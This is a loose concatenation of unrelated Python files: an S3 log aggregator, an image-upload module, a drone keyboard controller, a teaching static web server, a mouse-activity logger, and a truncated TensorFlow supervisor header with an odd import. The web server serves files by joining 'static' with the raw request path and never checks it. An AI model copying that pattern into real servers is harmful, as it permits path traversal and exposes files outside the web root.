{"path": f, "dt": timezone.localize(parse_time(os.path.basename(f)))}
for f in fs.glob(("{}{}/{}*").format(u.netloc, u.path, hour))
]
else:
files = [
{
"path": f.as_posix(),
"dt": timezone.localize(parse_time(os.path.basename(f))),
}
for f in Path(src).rglob("*")
]
return pd.DataFrame(files)
def create_file_system(root, endpoint_url, endpoint_region, s3_acl, logger):
logger.info("Creating filesystem for {}".format(root))
if root.startswith("s3://"):
return s3fs.S3FileSystem(
anon=False,
client_kwargs={
"endpoint_url": endpoint_url,
"region_name": endpoint_region,
"use_ssl": True,
},
s3_additional_kwargs={
"ACL": s3_acl,
},
)
else:
os.makedirs(root, exist_ok=True)
return None
def aggregate_range(
ctx,
src,
dst,
files,
timezone,
logger,
schema,
input_file_system,
output_file_system,
tracking_file_system,
tracking_dst,
hour,
cpu_count,
timeout,
logging_queue,
):
items = []
logger.info("Deserializing data in files from {}".format(src))
with ctx.Pool(processes=int(cpu_count)) as pool:
wg = WaitGroup()
def deserialize_file_callback(outputs):
items.extend(outputs)
wg.done()
def deserialize_file_error_callback(err):
traceback.print_exc()
raise err
for f in files.itertuples():
wg.add(1)
pool.apply_async(
deserialize_file,
args=(f.path, input_file_system, logging_queue),
callback=deserialize_file_callback,
error_callback=deserialize_file_error_callback,
)
logger.info("Waiting for deserialization to complete")
wg.wait(timeout=timeout)
logger.info("Deserialization data in files complete")
if len(items) == 0:
logger.info("No items found in filesystem")
return
gc.collect()
df = pd.DataFrame(items)
logger.info("Serializing {} items to {}".format(len(items), dst))
# Drop the memory footprint and garbage collect
items = []
gc.collect()
write_dataset(
pa.Table.from_pandas(df, schema=schema, preserve_index=False),
dst,
compression="SNAPPY",
partition_cols=["bucket_name", "operation", "year", "month", "day", "hour"],
partition_filename_cb=lambda x: "-".join([str(y) for y in x]) + ".parquet",
row_group_cols=["requester", "remoteip_int", "is_assumed_role", "is_user"],
fs=output_file_system,
cpu_count=cpu_count,
makedirs=(not dst.startswith("s3://")),
timeout=timeout,
logging_queue=logging_queue,
)
logger.info("Serializing items to {} is complete".format(dst))
if tracking_file_system is not None:
logger.info("Tracking completion of task")
tracking_file = "{}{}".format(tracking_dst, hour)
tracking_file_system.touch(tracking_file)
with s3fs.S3File(tracking_file_system, tracking_file, mode="wb") as f:
f.write(
bytearray(
"Completed hour {}. Now: {}\n".format(hour, datetime.now()), "utf-8"
)
)
logger.info("Successful creation file: {}!".format(tracking_file))
def configure_logging():
logger = logging.getLogger()
logger.setLevel(logging.INFO)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
logger.addHandler(ch)
return logger
def logging_process(logging_queue):
logger = configure_logging()
while True:
try:
# Don't add a timeout here, it just adds log noise
record = logging_queue.get(True)
# We send 'None' as a sentinel to tell the listener to quit looping.
# At the same time tell the logging_queue that no more data is coming.
if record is None:
break
logger.info(record)
except queue.Empty:
print("Queue is empty, killing logging process")
break
except (ValueError, EOFError):
print("Queue is closed, killing logging process")
break
except Exception:
print("Queue is broken")
traceback.print_exc()
break
def main():
#
# CPU Count
#
cpu_count = os.cpu_count()
#
# Now
#
utc = pytz.timezone("UTC")
now = datetime.now(utc)
#
# Setup Logging
#
logger = configure_logging()
ctx = get_context("spawn")
logging_queue = ctx.Manager().Queue(-1)
listener = ctx.Process(target=logging_process, args=(logging_queue,))
listener.start()
#
# Settings
#
src = os.getenv("SRC")
dst = os.getenv("DST")
tracking_dst = os.getenv("TRACKING_DST")
# Default is to look at the previous hour with the assumption that all the logs exist from that period
# Importantly this makes it easier to trigger on a cron job and know that the appropriate files are being found
default_hour = (now - timedelta(hours=1)).strftime("%Y-%m-%d-%H")
hour = os.getenv("HOUR", default_hour)
s3_default_region = os.getenv("AWS_REGION")
input_s3_acl = os.getenv("INPUT_S3_ACL", "bucket-owner-full-control")
input_s3_region = os.getenv("INPUT_S3_REGION", s3_default_region)
input_s3_endpoint = os.getenv(
"OUTPUT_S3_ENDPOINT",
"https://s3-fips.{}.amazonaws.com".format(input_s3_region),
)
output_s3_acl = os.getenv("OUTPUT_S3_ACL", "bucket-owner-full-control")
output_s3_region = os.getenv("OUTPUT_S3_REGION", s3_default_region)
output_s3_endpoint = os.getenv(
"OUTPUT_S3_ENDPOINT",
"https://s3-fips.{}.amazonaws.com".format(output_s3_region),
)
timeout = int(os.getenv("TIMEOUT", "300"))
logger.info("now: {}".format(now))
logger.info("cpu_count: {}".format(cpu_count))
logger.info("src: {}".format(src))
logger.info("dst: {}".format(dst))
logger.info("tracking_dst: {}".format(tracking_dst))
logger.info("hour: {}".format(hour))
logger.info("timeout: {}".format(timeout))
logger.info("aws-region: {}".format(s3_default_region))
logger.info("input_s3_acl: {}".format(input_s3_acl))
logger.info("input_s3_region: {}".format(input_s3_region))
logger.info("input_s3_endpoint: {}".format(input_s3_endpoint))
logger.info("output_s3_acl: {}".format(output_s3_acl))
logger.info("output_s3_region: {}".format(output_s3_region))
logger.info("output_s3_endpoint: {}".format(output_s3_endpoint))
if src is None or len(src) == 0:
logger.error("{} is missing".format("src"))
graceful_shutdown(listener, logging_queue, 1)
if dst is None or len(dst) == 0:
logger.error("{} is missing".format("dst"))
graceful_shutdown(listener, logging_queue, 1)
if src[len(src) - 1] != "/":
src = src + "/"
if dst[len(dst) - 1] != "/":
dst = dst + "/"
if tracking_dst is not None:
if len(tracking_dst) > 0 and tracking_dst[len(tracking_dst) - 1] != "/":
tracking_dst = tracking_dst + "/"
#
# Initialize File Systems
#
input_file_system = create_file_system(
src, input_s3_endpoint, input_s3_region, input_s3_acl, logger
)
output_file_system = create_file_system(
dst, output_s3_endpoint, output_s3_region, output_s3_acl, logger
)
tracking_file_system = None
if tracking_dst is not None:
if len(tracking_dst) > 0:
tracking_file_system = create_file_system(
tracking_dst,
output_s3_endpoint,
output_s3_region,
output_s3_acl,
logger,
)
#
# Check if this task has been completed already
#
if tracking_file_system is not None:
logger.info("Checking completion of task for hour: {}".format(hour))
tracking_file = "{}{}".format(tracking_dst, hour)
if tracking_file_system.exists(tracking_file):
logger.info("Task completed for hour: {}!".format(tracking_file))
graceful_shutdown(listener, logging_queue, 0)
#
# Load Schema
#
schema = create_schema()
all_files = create_files_index(
src,
hour,
utc,
input_file_system,
)
if len(all_files) == 0:
logger.info("no source files found within folder {}".format(src))
graceful_shutdown(listener, logging_queue, 0)
logger.info("List all files:")
logger.info(all_files)
# Test getting a file from the index and reading it
if input_file_system is not None:
logger.info("Test input filesystem")
read_test = all_files.iloc[0]["path"]
if input_file_system.exists(read_test):
logger.info(read_test)
with input_file_system.open(read_test) as f:
line_count = 0
for line in f:
line_count += 1
logger.info("Lines in first file: {}".format(line_count))
logger.info("Read test success!")
else:
logger.error("Unable to prove file {} exists".format(read_test))
graceful_shutdown(listener, logging_queue, 1)
if output_file_system is not None:
logger.info("Test output filesystem")
write_test = "{}{}".format(dst, uuid.uuid4())
output_file_system.touch(write_test)
logger.info("Successful create file: {}!".format(write_test))
with s3fs.S3File(output_file_system, write_test, mode="wb") as f:
f.write(
bytearray(
"test for {}. Now: {}\n".format(hour, datetime.now()), "utf-8"
)
)
logger.info("Successful write for file: {}!".format(write_test))
output_file_system.rm(write_test)
logger.info("Successfully deleted file: {}".format(write_test))
logger.info("Write test success for file {}!".format(write_test))
# The bulk of the work happens here
aggregate_range(
ctx,
src,
dst,
all_files,
utc,
logger,
schema,
input_file_system,
output_file_system,
tracking_file_system,
tracking_dst,
hour,
cpu_count,
timeout,
logging_queue,
)
graceful_shutdown(listener, logging_queue, 0)
def graceful_shutdown(listener, logging_queue, exit_code):
# Put one last record on the logging_queue to kill it and then wait
logging_queue.put_nowait(None)
# Now disable the listener
listener.join()
listener.close()
# Call an exit
sys.exit(exit_code)
if __name__ == "__main__":
try:
main()
except Exception:
traceback.print_exc()
sys.exit(1)
|
image.py
|
# Copyright (c) Niall Asher 2022
import datetime
import re
from base64 import urlsafe_b64decode
from math import gcd
from os import makedirs, mkdir, path
from types import SimpleNamespace
from base64 import b64encode
import PIL
from PIL import Image, ImageOps
from pony.orm import commit, db_session, select
from socialserver.util.config import config
from socialserver.util.output import console
from socialserver.db import db
from socialserver.constants import (
ImageTypes,
MAX_PIXEL_RATIO,
MAX_IMAGE_SIZE_GALLERY_PREVIEW,
MAX_IMAGE_SIZE_POST_PREVIEW,
MAX_IMAGE_SIZE_POST,
MAX_IMAGE_SIZE_PROFILE_PICTURE,
MAX_IMAGE_SIZE_PROFILE_PICTURE_LARGE,
ImageSupportedMimeTypes,
BLURHASH_X_COMPONENTS,
BLURHASH_Y_COMPONENTS,
PROCESSING_BLURHASH,
)
from secrets import token_urlsafe
from copy import copy
import magic
from typing import Tuple
import blurhash
from io import BytesIO
from threading import Thread
from hashlib import sha256
IMAGE_DIR = config.media.images.storage_dir
# where straight uploaded images are stored.
# the optimized ones are stored one above it
IMAGE_DIR_ORIGINAL = IMAGE_DIR + "/originals"
IMAGE_QUALITY = config.media.images.quality
# check if the image directory exists,
# if it doesn't, create it
if not path.exists(IMAGE_DIR):
makedirs(IMAGE_DIR)
console.log(f"Created image storage directory, {IMAGE_DIR}")
"""
save_imageset_to_disk
Saves an imageset (e.g. profile pic sm, lg) to disk, in the correct directory, with consistent naming.
Does not create a database entry.
in the future, this might be moved into amazon s3?
"""
# TODO: not sure how to best represent a dict with pythons type
# annotations. Need to fix this.
def save_images_to_disk(images: dict, image_hash: str) -> None:
def save_with_pixel_ratio(image, filename, pixel_ratio):
image.save(
f"{IMAGE_DIR}/{image_hash}/{filename}_{pixel_ratio}x.jpg",
type="JPEG",
quality=IMAGE_QUALITY,
progressive=True,
)
# FIXME: this is due to some deficiencies in the testing process.
if path.exists(f"{IMAGE_DIR}/{image_hash}"):
return
mkdir(f"{IMAGE_DIR}/{image_hash}")
for i in images.keys():
if i == ImageTypes.ORIGINAL:
images[i][0].save(
f"{IMAGE_DIR}/{image_hash}/{ImageTypes.ORIGINAL.value}.jpg",
type="JPEG",
quality=IMAGE_QUALITY,
)
else:
for j in images[i]:
save_with_pixel_ratio(j, i.value, images[i].index(j) + 1)
# FIXME: incredibly hacky way of dealing with duplicates.
images[i][images[i].index(j)] = token_urlsafe(16)
"""
create_random_image_identifier
return a random identifier to be associated with an image,
for retrieval purposes
"""
def create_random_image_identifier() -> str:
return token_urlsafe(32)
"""
mult_size_tuple
returns a new size tuple, multiplied from the given
one, for pixel ratio stuff
"""
def mult_size_tuple(size: Tuple[int, int], multiplier: int) -> Tuple[int, int]:
return tuple((int(size[0] * multiplier), int(size[1] * multiplier)))
"""
fit_image_to_size
Resizes an image to fit within the given size.
Doesn't care about MAX_PIXEL_RATIO; it's just the
unmodified original image.
"""
def fit_image_to_size(image: PIL.Image, size: Tuple[int, int]) -> PIL.Image:
img = copy(image)
img.thumbnail(size, PIL.Image.ANTIALIAS)
return img
"""
resize_image_aspect_aware
Resize an image, aspect aware.
Returns the result of fit_image_to_size after cropping to aspect
ratio from the top left. (i.e. you will get back an array of images,
for different pixel ratios, from 1 to MAX_PIXEL_RATIO)
"""
# TODO: fix typing returns a list of images
def resize_image_aspect_aware(image: PIL.Image, size: Tuple[int, int]) -> PIL.Image:
# TODO: this really need to make sure the image isn't
# smaller than the requested size already, since we don't
# want to make the size LARGER!
images = []
if image.size[0] < size[0] or image.size[1] < size[1]:
# create the largest possible image within max_image_size
size = calculate_largest_fit(image, size)
for pixel_ratio in range(1, MAX_PIXEL_RATIO + 1):
scaled_size = mult_size_tuple(size, pixel_ratio)
# if the scaled size is larger than the original, use the original
if scaled_size[0] > image.size[0] or scaled_size[1] > image.size[1]:
# TODO: see why the hell these are coming out as floats...
scaled_size = (int(size[0]), int(size[1]))
images.append(
ImageOps.fit(image, scaled_size, PIL.Image.BICUBIC, centering=(0.5, 0.5))
)
return images
"""
calculate largest image size to fit in the aspect ratio
given by a size.
used to prevent resizing an image to be larger than
it was originally, since that is pretty bad for optimization
(mind blowing, i know)
"""
def calculate_largest_fit(
image: PIL.Image, max_size: Tuple[int, int]
) -> Tuple[int, int]:
# calculate *target* aspect ratio from max size
divisor = gcd(max_size[0], max_size[1])
target_aspect_ratio = (max_size[0] / divisor, max_size[1] / divisor)
# create the largest possible image within the original image size, and the aspect ratio
new_width = image.size[0] - (image.size[0] % target_aspect_ratio[0])
new_height = new_width * (target_aspect_ratio[0] / target_aspect_ratio[1])
return tuple((new_width, new_height))
"""
convert_data_url_to_byte_buffer
Converts a data url to a BytesIO buffer, for further processing.
Does not resize, compress or save the image. Just loads it,
and returns it.
"""
def convert_data_url_to_byte_buffer(data_url: str) -> BytesIO:
# strip the mime type declaration, and the data: prefix,
# so we can convert to binary and create an image
data_url = re.sub(r"^data:image/.+;base64,", "", data_url)
# we're storing in BytesIO, so we don't have to
# write to disk, and we can use the image directly.
# we only want to store it once processing is done.
binary_data = BytesIO(urlsafe_b64decode(data_url))
return binary_data
"""
convert_buffer_to_image
Converts a buffer to a pil.Image object
"""
def convert_buffer_to_image(buffer: BytesIO) -> PIL.Image:
image = Image.open(buffer).convert("RGB")
return image
"""
commit_image_to_db
Commit db.Image entry to the database, and then return it's id.
"""
@db_session
def commit_image_to_db(identifier: str, userid: int, blur_hash: str) -> None or int:
uploader = db.User.get(id=userid)
if uploader is None:
console.log("[bold red]Could not commit to DB: user id does not exist!")
else:
entry = db.Image(
creation_time=datetime.datetime.utcnow(),
identifier=identifier,
uploader=db.User.get(id=userid),
blur_hash=blur_hash,
)
commit()
return entry.id
"""
generate_image_of_type
Optimize the original copy of an already uploaded image
for a new type. Raises an exception if the image cannot be converted.
"""
def generate_image_of_type(identifier):
image_exists = db.Image.get(identifier=identifier) is not None
if not image_exists:
raise Exception("image not found")
pass
"""
InvalidImageException
Raised if there is an issue with the image format
"""
class InvalidImageException(Exception):
pass
"""
check_buffer_mimetype
Check the file type of binary data, to ensure it matches an
array of mimetypes. Returns true if ok, false if not.
"""
# TODO: if we're using this in multiple places it should be moved to socialserver.util.file!
def check_buffer_mimetype(buffer, mimetypes):
mimetype = magic.from_buffer(buffer.read(2048), mime=True)
buffer.seek(0)
if mimetype not in mimetypes:
return False
return True
"""
_verify_image
verify an image using libmagic
"""
def _verify_image(image: BytesIO):
if not check_buffer_mimetype(image, ImageSupportedMimeTypes):
raise InvalidImageException
# we don't need to return anything;
# the exception will interrupt control
# flow if we have a problem. Otherwise,
# we just want to continue
"""
check_image_exists
check if an image exists based on it's id
"""
def check_image_exists(identifier: str):
return db.Image.get(identifier=identifier) is not None
"""
get_image_data_url_legacy
gets an image as a dataurl, for use with the legacy client.
"""
def get_image_data_url_legacy(identifier: str, image_type: ImageTypes) -> str:
if not check_image_exists(identifier):
raise InvalidImageException
pixel_ratio = config.legacy_api_interface.image_pixel_ratio
if image_type == ImageTypes.POST.value:
# only 1x for posts, since we store them at a very high size already.
# no other pixel ratio variants exist!
pixel_ratio = 1
file = f"{IMAGE_DIR}/{identifier}/{image_type.value}_{pixel_ratio}x.jpg"
# data_url = re.sub(r'^data:image/.+;base64,', '', data_url)
with open(file, "rb") as image_file:
return "data:image/jpg;base64," + b64encode(image_file.read()).decode()
"""
generate_blur_hash
Generate a blur hash from a given image
"""
def generate_blur_hash(image: Image) -> str:
im = copy(image)
buffer = BytesIO()
im.save(buffer, format="jpeg")
blur_hash = blurhash.encode(buffer, BLURHASH_X_COMPONENTS, BLURHASH_Y_COMPONENTS)
return blur_hash
"""
process_image
Convert the image into the appropriate format and commit it to the disk.
"""
@db_session
def process_image(image: Image, image_hash: str, image_id: int) -> None:
console.log(f"Processing image, id={image_id}. sha256sum={image_hash}")
# all resized images get 4 different pixel ratios, returned in an array from
# 0 to 3, where the pixel ratio is the index + 1. except for posts.
# we always deliver them in ''full'' quality (defined by MAX_IMAGE_SIZE_POST)
arr_gallery_preview_image = resize_image_aspect_aware(
image, MAX_IMAGE_SIZE_GALLERY_PREVIEW
)
# if upload_type == ImageUploadTypes.PROFILE_PICTURE:
arr_profilepic = resize_image_aspect_aware(image, MAX_IMAGE_SIZE_PROFILE_PICTURE)
arr_profilepic_lg = resize_image_aspect_aware(
image, MAX_IMAGE_SIZE_PROFILE_PICTURE_LARGE
)
img_post = fit_image_to_size(image, MAX_IMAGE_SIZE_POST)
arr_post_preview = resize_image_aspect_aware(image, MAX_IMAGE_SIZE_POST_PREVIEW)
arr_header = resize_image_aspect_aware(image, MAX_IMAGE_SIZE_POST)
images = {
ImageTypes.ORIGINAL: [image],
ImageTypes.POST: [img_post],
ImageTypes.POST_PREVIEW: arr_post_preview,
ImageTypes.HEADER: arr_header,
ImageTypes.GALLERY_PREVIEW: arr_gallery_preview_image,
ImageTypes.PROFILE_PICTURE: arr_profilepic,
ImageTypes.PROFILE_PICTURE_LARGE: arr_profilepic_lg,
}
save_images_to_disk(images, image_hash)
db_image = db.Image.get(id=image_id)
db_image.processed = True
db_image.blur_hash = generate_blur_hash(image)
commit()
console.log(f"Image, id={image_id}, processed.")
"""
handle_upload
Take a JSON string (read notes.md, #images) containing b64 images, and process it.
Will save it, store a db entry, and return
a SimpleNamespace with the following keys:
- id: db.Image ID
- uid: Image identifier
"""
@db_session
def handle_upload(
image: BytesIO, userid: int, threaded: bool = True
) -> SimpleNamespace:
# check that the given data is valid.
_verify_image(image)
uploader = db.User.get(id=userid)
if uploader is None:
console.log("[bold red]Could not commit to DB: user id does not exist!")
raise InvalidImageException # should maybe rename this?
# before we bother processing the image, we check if any image with an identical
# hash exists, since there is no point duplicating them in storage.
# get the hash of the image
image_hash = sha256(image.read()).hexdigest()
image.seek(0)
# and try to find an existing Image with the same one.
# if this != null, we'll use it to fill in some Image entry fields later.
existing_image = select(
image for image in db.Image if image.sha256sum is image_hash
).limit(1)[::]
existing_image = existing_image[0] if len(existing_image) >= 1 else None
image = convert_buffer_to_image(image)
access_id = create_random_image_identifier()
# create the image entry now, so we can give back an identifier.
entry = db.Image(
creation_time=datetime.datetime.utcnow(),
identifier=access_id,
uploader=db.User.get(id=userid),
blur_hash=PROCESSING_BLURHASH,
sha256sum=image_hash,
processed=False,
)
commit()
if existing_image is not None:
entry.blur_hash = existing_image.blur_hash
entry.processed = True
return SimpleNamespace(id=entry.id, identifier=access_id, processed=True)
if threaded:
Thread(target=lambda: process_image(image, image_hash, entry.id)).start()
else:
process_image(image, image_hash, entry.id)
# if we're not using threading, then it will have been processed by now.
return SimpleNamespace(id=entry.id, identifier=access_id, processed=(not threaded))
|
test_high_level.py
|
#!/usr/bin/env python
# source - https://github.com/whoenig/crazyflie_ros/commit/b048c1f2fd3ee34f899fa0e2f6c58a4885a39405#diff-970be3522034ff436332d391db26982a
from __future__ import absolute_import, division, unicode_literals, print_function
import rospy
import crazyflie
import time
import tf
#from crazyflie_driver.msg import Hover
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from crazyflie_driver.msg import GenericLogData
from geometry_msgs.msg import PointStamped, TransformStamped, PoseStamped #PoseStamped added to support vrpn_client
from threading import Thread
import tty, termios
import sys
speed=0.25
initialZ=0.35
global front,back , up , left , right , zrange
front=back=up=left=right=zrange= 0.0
def get_ranges(msg):
global front, back, up, left, right, zrange
front=msg.values[0]/1000
back = msg.values[1]/1000
up = msg.values[2]/1000
left = msg.values[3]/1000
right = msg.values[4]/1000
zrange = msg.values[5]/1000
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def keypress():
global key
key = getch()
def handler(cf):
r=rospy.Rate(5)
time.sleep(1)
cf.takeoff(targetHeight = initialZ, duration = 5.0)
time.sleep(5.0)
x, y, yaw = 0, 0, 0
z=initialZ
global key
key = None
global front, back, up, left, right, zrange
dist_threshold=0.1
def_duration=0.8 #1.8
try:
rospy.loginfo("keyboard controller.")
rospy.loginfo("press SPACE for emergency stop + land.")
rospy.loginfo("press 's' for stop.")
rospy.loginfo("press 'w' for forward.")
rospy.loginfo("press 'x' for backward.")
rospy.loginfo("press 'a' for left.")
rospy.loginfo("press 'd' for right.")
rospy.loginfo("press 'i' for up.")
rospy.loginfo("press 'k' for down.")
rospy.loginfo("press 'q','e' for yaw +-45 deg.")
while not rospy.is_shutdown():
if front > 0 :
if front < dist_threshold:
rospy.loginfo("forward collision avoidance")
cf.goTo(goal=[-0.1, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif back < dist_threshold:
rospy.loginfo("back collision avoidance")
cf.goTo(goal=[0.1, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif right < dist_threshold:
rospy.loginfo("right collision avoidance")
cf.goTo(goal=[0.0, 0.1, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif left < dist_threshold:
rospy.loginfo("left collision avoidance")
cf.goTo(goal=[0.0, -0.1, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif up < dist_threshold:
rospy.loginfo("top collision avoidance")
land_duration = z * 3
cf.land(targetHeight=0.0, duration=land_duration)
time.sleep(land_duration)
cf.stop()
break
if key is not None:
rospy.loginfo("************* Key pressed is " + key.decode('utf-8'))
if key == ' ':
# emergency land
land_duration=z*3
cf.land(targetHeight=0.0, duration=land_duration)
time.sleep(land_duration-0.5)
cf.stop()
break
elif key == 'w':
# move forward
cf.goTo(goal=[0.25, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'x':
# move backward
cf.goTo(goal=[-0.25, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'd':
# move right
cf.goTo(goal=[0.0, -0.25, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'a':
# move left
cf.goTo(goal=[0.0, 0.25, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'i':
# move up
cf.goTo(goal=[0.0, 0.0, 0.05], yaw=0, duration=def_duration, relative=True)
elif key == 'k':
# move down
cf.goTo(goal=[0.0, 0.0, -0.05], yaw=0, duration=def_duration, relative=True)
elif key == 'q':
# 45 degrees CW
cf.goTo(goal=[0.0, 0.0, 0.0], yaw=1.5708, duration=def_duration+1.0, relative=True) #slow down yaw rotation
elif key == 'e':
# 45 degrees CCW
cf.goTo(goal=[0.0, 0.0, 0.0], yaw= -1.5708, duration=def_duration+1.0, relative=True) #slow down yaw rotation
#elif key == 's':
# stop
key = None
t2 = Thread(target=keypress, )
t2.start()
#print(" gospeed x: {}, y: {}, z: {} , yaw: {} \n".format( x, y, z ,yaw))
#cf.goSpeed(x, y, z, yaw)
r.sleep()
rospy.loginfo('********EXITING*********')
cf.stop()
#break
except Exception as e:
cf.stop()
rospy.loginfo('*******keyboard input exception')
rospy.loginfo(e)
if __name__ == '__main__':
rospy.init_node('test_high_level')
rospy.Subscriber('/cf1/log_ranges', GenericLogData, get_ranges)
prefix = '/cf1'
cf = crazyflie.Crazyflie("/cf1", "world")
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
cf.setParam("commander/enHighLevel", 1)
cf.setParam("stabilizer/estimator", 2) # Use EKF
cf.setParam("ctrlMel/kp_z", 0.8) #reduce z wobble - default 1.25
#cf.setParam("ctrlMel/ki_z", 0.06) #reduce z wobble - default 0.05
#cf.setParam("ctrlMel/kd_z", 0.2) #reduce z wobble - default 0.4
#cf.setParam("ctrlMel/i_range_z", 0.2) #reduce z wobble
## reset kalman
cf.setParam("kalman/initialX", 0)
cf.setParam("kalman/initialY", 0)
cf.setParam("kalman/initialZ", 0)
cf.setParam("kalman/resetEstimation", 1)
########
cf.setParam("stabilizer/controller", 2) # 2=Use mellinger controller
time.sleep(1.0)
rospy.loginfo("launching threads")
t1 = Thread(target=handler, args=(cf,))
t2 = Thread(target=keypress, )
t1.start()
t2.start()
|
03-静态web服务器-多任务.py
|
import socket
import os
import threading
# 处理客户端请求
def handle_client_request(new_socket):
# 接受客户端请求信息
recv_data = new_socket.recv(4096)
# 判断请求数据是否为空,为空退出函数
if len(recv_data) == 0:
new_socket.close()
return
# 对接受数据进行二进制解码
recv_content = recv_data.decode("utf-8")
# 对数据进行分割
request_list = recv_content.split(" ", maxsplit=2)
# 获取请求的资源路径
request_path = request_list[1]
print(request_path)
if request_path == "/":
request_path = "/index.html"
# 判断文件是否存在
# 1.os.path.exits
# if not os.path.exists("static"+request_path):
# print("static"+request_path+"not exist")
# return
# 2.try-except
try:
# 打开文件读取数据 提示,这里使用rb模式,兼容打开图片文件
with open("static"+request_path, "rb") as file:
file_data = file.read()
except Exception as e:
# 代码执行到此,说明没有请求的文件,返回404
# 响应行
response_line = "HTTP/1.1 404 Not Found\r\n"
# 响应头
response_header = "Server: LRY/1.0\r\n"
# 空行
# 响应体
with open("static/error.html", "rb") as file:
file_data = file.read()
response_body = file_data
response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
# response已经是二进制数据,不用再编码
# # 把数据编码成二进制
# response_data = response.encode("utf-8")
# 发送http响应格式数据
new_socket.send(response)
else:
# 代码执行到此,说明找到了请求文件,返回200
# 将数据封装成http响应报文发送给浏览器客户端
# 响应行
response_line = "HTTP/1.1 200 OK\r\n"
# 响应头
response_header = "Server: LRY/1.0\r\n"
# 空行
# 响应体
response_body = file_data
# 此时response_body是二进制,不能和字符串拼接,将前面字符串编码为二进制
response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
# response已经是二进制数据,不用再编码
# # 把数据编码成二进制
# response_data = response.encode("utf-8")
# 发送http响应格式数据
new_socket.send(response)
finally:
# 关闭服务端套接字服务
new_socket.close()
def main():
# 创建tcp服务端套接字
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 设置端口号复用
tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
# 绑定端口
tcp_server_socket.bind(("", 8000))
# 设置监听
tcp_server_socket.listen(128)
# 循环等待客户端请求
while True:
# 等待接受客户端连接请求
new_socket, ip_port = tcp_server_socket.accept()
# 代码执行到此,说明连接建立成功
sub_thread = threading.Thread(target=handle_client_request, args=(new_socket,))
# 设置守护主线程
sub_thread.setDaemon(True)
# 启动子线程
sub_thread.start()
# 判断是否是主程序
if __name__ == "__main__":
main()
|
logger.py
|
import os
import json
import time
from threading import Event, Thread
from pynput.mouse import Listener, Button
from sentry_sdk import capture_exception
from utils.directions import Direction
from consts import CLICK_PATH, GB_TO_B, MOVE_PATH, MS_TO_NS, NS_TO_MS, SAVE_INTERVAL_IN_S, RECORD_INTERVAL_IN_MS, SCROLL_PATH
class Logger:
_kill = Event()
_LISTENER: Listener
_listen = Event()
_dump = Event()
_movement_data = []
_last_movement_record = 0
_click_data = []
_click_times = dict()
_click_positions = dict()
_scroll_data = []
def __init__(self) -> None:
Thread(name="Dumper", daemon=True, target=self.execute_all).start()
self._LISTENER = Listener(
on_move=self.on_move,
on_click=self.on_click,
on_scroll=self.on_scroll)
self._LISTENER.start()
self._LISTENER.wait()
def __delete__(self, _) -> None:
self._kill.set()
self._LISTENER.stop()
def start(self) -> None:
self._listen.set()
self._dump.set()
def stop(self) -> None:
self._listen.clear()
self._dump.clear()
def on_move(self, x: int, y: int) -> None:
"""record movement in set timesteps"""
if not self._listen:
return
if self._last_movement_record + (RECORD_INTERVAL_IN_MS * MS_TO_NS) <= time.time_ns():
self._movement_data.append(dict(
timestamp=int(time.time_ns() * NS_TO_MS),
position=dict(x=x, y=y)))
self._last_movement_record = time.time_ns()
def on_click(self, x: int, y: int, button: Button, pressed: bool) -> None:
"""record clicks with clicked button, time, duration and positions"""
if not self._listen:
return
if pressed:
self._click_times[button.name] = time.time_ns()
self._click_positions[button.name] = (x, y)
else:
try:
self._click_data.append(dict(
startTime=int(self._click_times[button.name] * NS_TO_MS),
duration=int((time.time_ns()-self._click_times[button.name]) * NS_TO_MS),
button=button.name,
startPosition=dict(x=self._click_positions[button.name][0], y=self._click_positions[button.name][1]),
endPosition=dict(x=x, y=y)))
except Exception as e:
capture_exception(e)
except:
pass
def on_scroll(self, x: int, y: int, dx: int, dy: int) -> None:
"""record scrolling with time, position and direction"""
if not self._listen:
return
self._scroll_data.append(dict(
timestamp=int(time.time_ns() * NS_TO_MS),
position=dict(x=x, y=y),
direction=Direction.getDirection(dx, dy).name))
def directory_sized(self, path: str, size: int) -> None:
while sum([os.stat(it).st_size for it in os.scandir(path)]) > size*GB_TO_B:
oldest_file = min(os.scandir(path), key=os.path.getctime)
os.remove(os.path.abspath(oldest_file))
def dump(self, path: str, data: list) -> None:
with open(f"{path}/{int(time.time_ns() * NS_TO_MS)}.json", 'w', encoding="UTF-8") as file:
file.write(json.dumps(data))
def execute(self, path: str, max_size_in_gb: int, data: list) -> list:
os.makedirs(path, exist_ok=True)
self.directory_sized(path, max_size_in_gb)
self.dump(path, data)
data.clear()
def execute_all(self) -> None:
while not self._kill.wait(SAVE_INTERVAL_IN_S):
if self._dump.is_set():
try:
self.execute(MOVE_PATH, 3, self._movement_data)
self.execute(CLICK_PATH, 1, self._click_data)
self.execute(SCROLL_PATH, 1, self._scroll_data)
finally:
pass
|
supervisor.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from chineselib import trainset
